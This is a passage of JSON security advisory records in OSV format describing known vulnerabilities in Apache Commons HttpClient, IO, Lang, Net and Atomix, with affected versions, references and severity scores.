"related": [ "CGA-36v2-2382-h797", "CGA-7hvw-h9c4-h6h5", "CGA-x2pj-p6gm-xpqp" ], "summary": "Improper Certificate Validation in Apache Commons HttpClient", "details": "Apache Commons HttpClient 3.x, as used 
in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.\n\nNote that the Commons HttpClient project is [end of life](https://hc.apache.org/httpclient-legacy/). It has been replaced by the Apache HttpComponents project in its [HttpClient](https://hc.apache.org/httpcomponents-client-5.4.x/) and [HttpCore](https://hc.apache.org/httpcomponents-core-5.3.x/) modules. CVE-2012-5783 has been patched in [v4.0](https://repo1.maven.org/maven2/org/apache/httpcomponents/httpclient/4.0/) of the Apache HttpComponents HttpClient module.", "affected": [ { "package": { "name": "commons-httpclient:commons-httpclient", "ecosystem": "Maven", "purl": "pkg:maven/commons-httpclient/commons-httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0" } ] } ], "versions": [ "20020423", "3.0", "3.0.1", "3.1", "3.1-alpha1", "3.1-beta1", "3.1-jenkins-1", "3.1-jenkins-2", "3.1-jenkins-3", "3.1-rc1" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3832-9276-x7gf/GHSA-3832-9276-x7gf.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-5783" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:0868" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/79984" }, { "type": "PACKAGE", "url": "https://github.com/apache/httpcomponents-client" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/HTTPCLIENT-1265" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2013-02/msg00078.html" }, { "type": "WEB", "url": 
"http://lists.opensuse.org/opensuse-updates/2013-04/msg00040.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2013-04/msg00041.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2013-04/msg00053.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-0270.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-0679.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-0680.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-0682.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1853.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0224.html" }, { "type": "WEB", "url": "http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2769-1" } ], "database_specific": { "cwe_ids": [ "CWE-295" ], "github_reviewed": true, "github_reviewed_at": "2022-07-13T13:58:59Z", "nvd_published_at": "2012-11-04T22:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-78wr-2p64-hpwj", "published": "2024-10-03T12:30:48Z", "modified": "2025-01-31T15:38:02.141931Z", "aliases": [ "CVE-2024-47554" ], "related": [ "CGA-252j-5hcw-3x22", "CGA-32hx-qx96-46q6", "CGA-7c3h-fr9p-6vxc", "CGA-937h-9qvw-8r89", "CGA-9rwq-q6m2-g373", "CGA-9w8c-c5fw-q342", "CGA-g37r-p8hp-mp2c", "CGA-hr85-ppfv-vg2r", "CGA-j9w9-457f-3v67", "CGA-pwg2-7493-q9wm", "CGA-r6pw-p73w-rq5f", "CGA-v9q6-cg5v-8pf7", "CGA-vppp-hq87-2m8x", "CGA-w8v5-m4jv-f5hj", "CGA-wcj9-xx49-cqh2" ], "summary": "Apache Commons IO: Possible denial of service attack on untrusted input to XmlStreamReader", "details": "Uncontrolled Resource Consumption vulnerability in Apache Commons IO.\n\nThe `org.apache.commons.io.input.XmlStreamReader` class may excessively consume CPU resources when processing maliciously crafted input.\n\n\nThis issue affects Apache Commons IO: from 2.0 before 2.14.0.\n\nUsers are recommended 
to upgrade to version 2.14.0 or later, which fixes the issue.", "affected": [ { "package": { "name": "commons-io:commons-io", "ecosystem": "Maven", "purl": "pkg:maven/commons-io/commons-io" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "fixed": "2.14.0" } ] } ], "versions": [ "2.0", "2.0.1", "2.1", "2.10.0", "2.11.0", "2.12.0", "2.13.0", "2.2", "2.3", "2.4", "2.5", "2.6", "2.7", "2.8.0", "2.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-78wr-2p64-hpwj/GHSA-78wr-2p64-hpwj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47554" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-io" }, { "type": "WEB", "url": "https://lists.apache.org/thread/6ozr91rr9cj5lm0zyhv30bsp317hk5z1" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250131-0010" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/10/03/2" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2024-10-03T16:52:23Z", "nvd_published_at": "2024-10-03T12:15:02Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gwrp-pvrq-jmwv", "published": "2021-04-26T16:04:00Z", "modified": "2024-03-12T05:31:30.961796Z", "aliases": [ "CVE-2021-29425" ], "summary": "Path Traversal and Improper Input Validation in Apache Commons IO", "details": "In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like \"//../foo\", or \"\\\\..\\foo\", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus \"limited\" path traversal), 
if the calling code would use the result to construct a path value.", "affected": [ { "package": { "name": "commons-io:commons-io", "ecosystem": "Maven", "purl": "pkg:maven/commons-io/commons-io" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7" } ] } ], "versions": [ "0.1", "1.0", "1.1", "1.2", "1.3", "1.3.1", "1.3.2", "1.4", "2.0", "2.0.1", "2.1", "2.2", "2.3", "2.4", "2.5", "2.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "com.cosium.vet:vet", "ecosystem": "Maven", "purl": "pkg:maven/com.cosium.vet/vet" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0" }, { "last_affected": "3.22" } ] } ], "versions": [ "1.0", "1.1", "1.11", "1.12", "1.13", "1.2", "1.3", "1.4", "1.5", "2.2", "2.3", "2.6", "2.7", "2.8", "2.9", "3.0", "3.10", "3.11", "3.12", "3.13", "3.14", "3.15", "3.16", "3.17", "3.18", "3.19", "3.22" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "com.diamondq.common:common-thirdparty.jcasbin", "ecosystem": "Maven", "purl": "pkg:maven/com.diamondq.common/common-thirdparty.jcasbin" }, "versions": [ "1.4.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "com.liferay:com.liferay.sass.compiler.jsass", "ecosystem": "Maven", "purl": "pkg:maven/com.liferay/com.liferay.sass.compiler.jsass" }, "versions": [ "1.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "com.virjar:ratel-api", "ecosystem": 
"Maven", "purl": "pkg:maven/com.virjar/ratel-api" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.0" }, { "last_affected": "1.3.6" } ] } ], "versions": [ "1.0.0", "1.1.0", "1.2.0", "1.3.0", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "net.hasor:cobble-lang", "ecosystem": "Maven", "purl": "pkg:maven/net.hasor/cobble-lang" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.4.1" }, { "last_affected": "4.6.2" } ] } ], "versions": [ "4.4.1", "4.4.2", "4.5.0", "4.5.1", "4.5.2", "4.5.3", "4.5.4", "4.6.0", "4.6.1", "4.6.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "org.apache.commons:commons-io", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-io" }, "versions": [ "1.3.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "org.apache.servicemix.bundles:org.apache.servicemix.bundles.commons-io", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.servicemix.bundles/org.apache.servicemix.bundles.commons-io" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.4" }, { "last_affected": "1.5" } ] } ], "versions": [ "1.4_1", "1.4_2", "1.4_3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "org.checkerframework.annotatedlib:commons-io", "ecosystem": "Maven", "purl": "pkg:maven/org.checkerframework.annotatedlib/commons-io" }, "ranges": [ { "type": 
"ECOSYSTEM", "events": [ { "introduced": "2.6" }, { "fixed": "2.7" } ] } ], "versions": [ "2.6", "2.6.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "org.smartboot.servlet:servlet-core", "ecosystem": "Maven", "purl": "pkg:maven/org.smartboot.servlet/servlet-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.1.9" }, { "last_affected": "0.6" } ] } ], "versions": [ "0.1.9", "0.2", "0.2.1", "0.3", "0.3.1", "0.4", "0.5", "0.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29425" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8efcbabde973ea72f5e0933adc48ef1425db5cde850bf641b3993f31@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r92ea904f4bae190b03bd42a4355ce3c2fbe8f36ab673e03f6ca3f9fa@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra8ef65aedc086d2d3d21492b4c08ae0eb8a3a42cc52e29ba1bc009d8@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raa053846cae9d497606027816ae87b4e002b2e0eb66cb0dee710e1f5@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad4ae544747df32ccd58fff5a86cd556640396aeb161aa71dd3d192a@%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbebd3e19651baa7a4a5503a9901c95989df9d40602c8e35cb05d3eb5@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc10fa20ef4d13cbf6ebe0b06b5edb95466a1424a9b7673074ed03260@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", 
"url": "https://lists.apache.org/thread.html/rc2dd3204260e9227a67253ef68b6f1599446005bfa0e1ddce4573a80@%3Cpluto-dev.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc359823b5500e9a9a2572678ddb8e01d3505a7ffcadfa8d13b8780ab%40%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc5f3df5316c5237b78a3dff5ab95b311ad08e61d418cd992ca7e34ae@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc65f9bc679feffe4589ea0981ee98bc0af9139470f077a91580eeee0@%3Cpluto-dev.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca71a10ca533eb9bfac2d590533f02e6fb9064d3b6aa3ec90fdc4f51@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd09d4ab3e32e4b3a480e2ff6ff118712981ca82e817f28f2a85652a6@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re41e9967bee064e7369411c28f0f5b2ad28b8334907c9c6208017279@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/red3aea910403d8620c73e1c7b9c9b145798d0469eb3298a7be7891af@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfa2f08b7c0caf80ca9f4a18bd875918fdd4e894e2ea47942a4589b9c@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfcd2c649c205f12b72dde044f905903460669a220a2eb7e12652d19d@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfd01af05babc95b8949e6d8ea78d9834699e1b06981040dde419a330@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00016.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0004" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://arxiv.org/pdf/2306.05534.pdf" }, { "type": "WEB", "url": "https://github.com/jensdietrich/xshady-release/tree/main/CVE-2021-29425" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/IO-556" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r01b4a1fcdf3311c936ce33d75a9398b6c255f00c1a2f312ac21effe1@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0bfa8f7921abdfae788b1f076a12f73a92c93cc0a6e1083bce0027c5@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d73e2071d1f1afe1a15da14c5b6feb2cf17e3871168d5a3c8451436@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1c2f4683c35696cf6f863e3c107e37ec41305b1930dd40c17260de71@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r20416f39ca7f7344e7d76fe4d7063bb1d91ad106926626e7e83fb346@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2345b49dbffa8a5c3c589c082fe39228a2c1d14f11b96c523da701db@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r27b1eedda37468256c4bb768fde1e8b79b37ec975cbbfd0d65a7ac34@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2bc986a070457daca457a54fe71ee09d2584c24dc262336ca32b6a19@%3Cdev.creadur.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/r2df50af2641d38f432ef025cd2ba5858215cc0cf3fc10396a674ad2e@%3Cpluto-scm.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r345330b7858304938b7b8029d02537a116d75265a598c98fa333504a@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4050f9f6b42ebfa47a98cbdee4aabed4bb5fb8093db7dbb88faceba2@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r462db908acc1e37c455e11b1a25992b81efd18e641e7e0ceb1b6e046@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r477c285126ada5c3b47946bb702cb222ac4e7fd3100c8549bdd6d3b2@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r47ab6f68cbba8e730f42c4ea752f3a44eb95fb09064070f2476bb401@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5149f78be265be69d34eacb4e4b0fc7c9c697bcdfa91a1c1658d717b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r523a6ffad58f71c4f3761e3cee72df878e48cdc89ebdce933be1475c@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r808be7d93b17a7055c1981a8453ae5f0d0fce5855407793c5d0ffffa@%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8569a41d565ca880a4dee0e645dad1cd17ab4a92e68055ad9ebb7375@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r86528f4b7d222aed7891e7ac03d69a0db2a2dfa17b86ac3470d7f374@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r873d5ddafc0a68fd999725e559776dc4971d1ab39c0f5cc81bd9bc04@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r8bfc7235e6b39d90e6f446325a5a44c3e9e50da18860fdabcee23e29@%3Cissues.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2021-04-26T15:21:31Z", "nvd_published_at": "2021-04-13T07:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j288-q9x7-2f5v", "published": "2025-07-11T15:31:37Z", "modified": "2025-11-05T20:34:04.566048Z", "aliases": [ "CVE-2025-48924" ], "related": [ "CGA-22cr-f3cr-c7cm", "CGA-29x5-f7v5-rrg6", "CGA-2fmr-p6rq-h6gj", "CGA-48h5-566h-rvpp", "CGA-4fcv-jq36-r7hx", "CGA-523g-m72h-8798", "CGA-6pxc-gq99-gpx4", "CGA-6v52-24xf-x875", "CGA-78fw-62xf-9rm8", "CGA-7r2r-4fw7-h3qv", "CGA-8c99-22mx-hg38", "CGA-8w2x-v747-c9c7", "CGA-8x43-fp55-w32w", "CGA-9j28-2jv5-qv67", "CGA-9rcm-4h29-rv8h", "CGA-ff3x-mc4g-82q2", "CGA-g3gg-7c6f-x6qx", "CGA-hj53-w7gr-6f9r", "CGA-j6cx-9v8j-x9cc", "CGA-j84p-prch-g8wm", "CGA-j8w2-rj92-x353", "CGA-j93m-mcxv-7hxr", "CGA-jvxv-2xch-6xjm", "CGA-m7pc-jwx3-vm7v", "CGA-mhg4-342v-w7xq", "CGA-mp4q-mrjj-8862", "CGA-p7fm-p736-2fmc", "CGA-p87f-qfxg-x45v", "CGA-pxx2-65vr-8cc4", "CGA-rc28-932p-89cv", "CGA-v52f-47gw-2xcm", "CGA-vxhq-8vpg-mr2p" ], "summary": "Apache Commons Lang is vulnerable to Uncontrolled Recursion when processing long inputs", "details": "Uncontrolled Recursion vulnerability in Apache Commons Lang.\n\nThis issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0.\n\nThe methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. 
Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop.\n\nUsers are recommended to upgrade to version 3.18.0, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-lang3", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-lang3" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0" }, { "fixed": "3.18.0" } ] } ], "versions": [ "3.0", "3.0.1", "3.1", "3.10", "3.11", "3.12.0", "3.13.0", "3.14.0", "3.15.0", "3.16.0", "3.17.0", "3.2", "3.2.1", "3.3", "3.3.1", "3.3.2", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j288-q9x7-2f5v/GHSA-j288-q9x7-2f5v.json" } }, { "package": { "name": "commons-lang:commons-lang", "ecosystem": "Maven", "purl": "pkg:maven/commons-lang/commons-lang" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "last_affected": "2.6" } ] } ], "versions": [ "2.0", "2.1", "2.2", "2.3", "2.4", "2.5", "2.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j288-q9x7-2f5v/GHSA-j288-q9x7-2f5v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48924" }, { "type": "WEB", "url": "https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-lang" }, { "type": "WEB", "url": "https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00000.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00026.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00032.html" }, { "type": "WEB", 
"url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00036.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/07/11/1" } ], "database_specific": { "cwe_ids": [ "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2025-07-12T00:48:03Z", "nvd_published_at": "2025-07-11T15:15:24Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cgp8-4m63-fhh5", "published": "2022-12-03T15:30:26Z", "modified": "2023-11-08T04:06:18.513983Z", "aliases": [ "CVE-2021-37533" ], "summary": "Apache Commons Net vulnerable to information leakage via malicious server", "details": "Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client.\nThe default in version 3.9.0 is now false to ignore such hosts, as cURL does. 
See https://issues.apache.org/jira/browse/NET-711.\n", "affected": [ { "package": { "name": "commons-net:commons-net", "ecosystem": "Maven", "purl": "pkg:maven/commons-net/commons-net" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.9.0" } ] } ], "versions": [ "1.0.0", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.3.0", "1.4.0", "1.4.1", "2.0", "2.2", "3.0", "3.0.1", "3.1", "3.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.7.1", "3.7.2", "3.8.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-cgp8-4m63-fhh5/GHSA-cgp8-4m63-fhh5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37533" }, { "type": "WEB", "url": "https://github.com/apache/commons-net/commit/4fe1bae56e53f32756b1ca3296f3dd2c45e3e060" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-net" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/NET-711" }, { "type": "WEB", "url": "https://lists.apache.org/thread/o6yn9r9x6s94v97264hmgol1sf48mvx7" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00038.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5307" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/12/03/1" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-12-05T23:21:08Z", "nvd_published_at": "2022-12-03T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2fqw-684c-pvp7", "published": "2021-12-17T20:40:50Z", "modified": "2023-11-08T04:03:32.892349Z", "aliases": [ "CVE-2020-35213" ], "summary": "An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false link event messages sent to a master ONOS node.", "details": "An issue in 
Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false link event messages sent to a master ONOS node.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-2fqw-684c-pvp7/GHSA-2fqw-684c-pvp7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35213" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1i8tVVGE8z9Rtl9UTwktOJpkZwT4kBVLgIk307qMiw_8/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [ "CWE-74" ], "github_reviewed": true, 
